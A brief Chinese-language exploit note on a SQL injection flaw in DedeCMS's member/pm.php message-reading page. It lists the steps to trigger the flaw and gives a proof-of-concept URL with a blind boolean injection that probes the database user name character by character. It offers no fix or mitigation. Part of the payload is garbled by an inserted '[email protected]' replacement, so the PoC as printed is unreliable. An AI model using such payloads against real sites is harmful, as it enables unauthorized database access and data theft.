dedecms pm.php注入漏洞

影响版本

未知

利用方法

先给自己留个言

访问留言对应的id的url可以看到这条留言

http://127.0.0.1/dede/member/pm.php?dopost=read&id=1

利用poc

http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and [email protected]`'` or 2=(select if(substring((select user()),1,1) ='r',2,1)) -- [email protected]`'`